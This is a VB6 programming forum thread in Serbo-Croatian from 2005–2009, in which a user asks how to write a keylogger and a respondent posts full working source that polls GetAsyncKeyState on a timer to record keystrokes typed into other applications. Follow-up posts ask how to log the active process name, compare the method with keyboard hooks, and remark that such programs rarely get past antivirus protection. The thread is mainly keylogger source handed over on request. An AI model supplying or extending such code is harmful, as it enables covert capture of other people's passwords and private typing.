Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.

Keylogger

[es] :: Visual Basic 6 :: Keylogger

[ Pregleda: 5711 | Odgovora: 7 ] > FB > Twit

Postavi temu Odgovori

Autor

Pretraga teme: Traži
Markiranje Štampanje RSS

Microsoft
Split

Član broj: 41316
Poruke: 31
*.net.t-com.hr.



Profil

icon Keylogger20.04.2005. u 12:17 - pre 216 meseci
Da li netko zna kako napraviti keylogger u VB 6.0 ?
Kad bi user bio fokusiran na formu onda bih mogao koristiti key_down proceduru.Ovako ne znam što bih...Pomagajte ljudi

[Ovu poruku je menjao mladenovicz dana 20.04.2005. u 13:29 GMT+1]
 
Odgovor na temu

mladenovicz
Zeljko Mladenovic
Xoran Technologies, Inc., Ann Arbor, MI,
USA / Software Engineer
Ann Arbor, MI, USA

Član broj: 6598
Poruke: 2065
*.bg.wifi.vline.verat.net.

Jabber: mladenovicz@elitesecurity.org
ICQ: 95144142
Sajt: yubc.net/~mz


Profil

icon Re: Keylogger20.04.2005. u 12:22 - pre 216 meseci
Code:

'In a module
Public Const DT_CENTER = &H1
Public Const DT_WORDBREAK = &H10
Type RECT
    Left As Long
    Top As Long
    Right As Long
    Bottom As Long
End Type
Declare Function DrawTextEx Lib "user32" Alias "DrawTextExA" _
(ByVal hDC As Long, ByVal lpsz As String, ByVal n As Long, _
lpRect As RECT, ByVal un As Long, ByVal lpDrawTextParams As Any) As Long
Declare Function SetTimer Lib "user32" (ByVal hwnd As Long, _
ByVal nIDEvent As Long, ByVal uElapse As Long, ByVal lpTimerFunc As Long) As Long
Declare Function KillTimer Lib "user32" _
(ByVal hwnd As Long, ByVal nIDEvent As Long) As Long
Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
Declare Function SetRect Lib "user32" (lpRect As RECT, _
ByVal X1 As Long, ByVal Y1 As Long, ByVal X2 As Long, ByVal Y2 As Long) As Long
Global Cnt As Long, sSave As String, sOld As String, Ret As String
Dim Tel As Long
Function GetPressedKey() As String
    For Cnt = 32 To 128
        'Get the keystate of a specified key
        If GetAsyncKeyState(Cnt) <> 0 Then
            GetPressedKey = Chr$(Cnt)
            Exit For
        End If
    Next Cnt
End Function
Sub TimerProc(ByVal hwnd As Long, ByVal nIDEvent As Long, ByVal uElapse As Long, ByVal lpTimerFunc As Long)
    Ret = GetPressedKey
    If Ret <> sOld Then
        sOld = Ret
        sSave = sSave + sOld
    End If
End Sub

'In a form
Private Sub Form_Load()
    'KPD-Team 1999
    'URL: http://www.allapi.net/
    'E-Mail: [email protected]
    Me.Caption = "Key Spy"
    'Create an API-timer
    SetTimer Me.hwnd, 0, 1, AddressOf TimerProc
End Sub
Private Sub Form_Paint()
    Dim R As RECT
Const mStr = "Start this project, go to another application, type something, " & _
                 "switch back to this application and unload the form. If you unload " & _
                 "the form, a messagebox with all the typed keys will be shown."
    'Clear the form
    Me.Cls
    'API uses pixels
    Me.ScaleMode = vbPixels
    'Set the rectangle's values
    SetRect R, 0, 0, Me.ScaleWidth, Me.ScaleHeight
    'Draw the text on the form
    DrawTextEx Me.hDC, mStr, Len(mStr), R, DT_WORDBREAK Or DT_CENTER, ByVal 0&
End Sub
Private Sub Form_Resize()
    Form_Paint
End Sub
Private Sub Form_Unload(Cancel As Integer)
    'Kill our API-timer
    KillTimer Me.hwnd, 0
    'Show all the typed keys
    MsgBox sSave
End Sub

 
Odgovor na temu

Microsoft
Split

Član broj: 41316
Poruke: 31
*.net.t-com.hr.



Profil

icon Re: Keylogger20.04.2005. u 23:17 - pre 216 meseci
Mladenovitz, hvala na brzom odgovoru.
Jos me nesto zanima.kako dobiti ime procesa u kojem tekst upisan?
 
Odgovor na temu

Shadowed
Vojvodina

Član broj: 649
Poruke: 12819



+4754 Profil

icon Re: Keylogger21.04.2005. u 15:37 - pre 216 meseci
Imam ja jedno podpitanje. Koji je razlog davanja prednosti ovom nacinu umesto koriscanja keyboard hook-a?
 
Odgovor na temu

mladenovicz
Zeljko Mladenovic
Xoran Technologies, Inc., Ann Arbor, MI,
USA / Software Engineer
Ann Arbor, MI, USA

Član broj: 6598
Poruke: 2065
*.bg.wifi.vline.verat.net.

Jabber: mladenovicz@elitesecurity.org
ICQ: 95144142
Sajt: yubc.net/~mz


Profil

icon Re: Keylogger21.04.2005. u 16:02 - pre 216 meseci
Citat:
Shadowed: Koji je razlog davanja prednosti ovom nacinu umesto koriscanja keyboard hook-a?


Ovaj kod mi je bio "pod rukom"
 
Odgovor na temu

ArtifeX

Član broj: 39865
Poruke: 192
212.200.69.*



Profil

icon Re: Keylogger28.04.2005. u 22:32 - pre 216 meseci
I mene interesuje kako da se vidi koji je proces bio aktivan dok je nesto kucano.

I jos nesto zasto ovaj source ne belezi znakove .'\][ itd i umesto 0123...9 na numerickom delu tastature belezi abcd....
||< ArtifeX >||
 
Odgovor na temu

Lord_Of_Slackware
Lord_Of_Slackware

Član broj: 101321
Poruke: 37
212.200.170.*



Profil

icon Re: Keylogger18.12.2007. u 00:16 - pre 184 meseci
Ako pak ne znate VB6 dobro i zelite procese, znakove ili pak sta drugo imate source code bazu http://www.planetsourcecode.com/ pa potrazite ima puno primera. Mada najveci problem kod njih je sto ce retko koji proci AV zastitu.
 
Odgovor na temu

manifesto
Kevin Mitnick
microsoft
Beograd

Član broj: 239766
Poruke: 1
91.150.69.*

ICQ: 111222111
Sajt: www.skinimise.com


Profil

icon Re: Keylogger u VB614.11.2009. u 15:54 - pre 161 meseci
moze li neko da ostavi screanshot za izgled keyloggera u VB6 ,sa ovum gore kodom ??
kevin
 
Odgovor na temu

[es] :: Visual Basic 6 :: Keylogger

[ Pregleda: 5711 | Odgovora: 7 ] > FB > Twit

Postavi temu Odgovori

Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.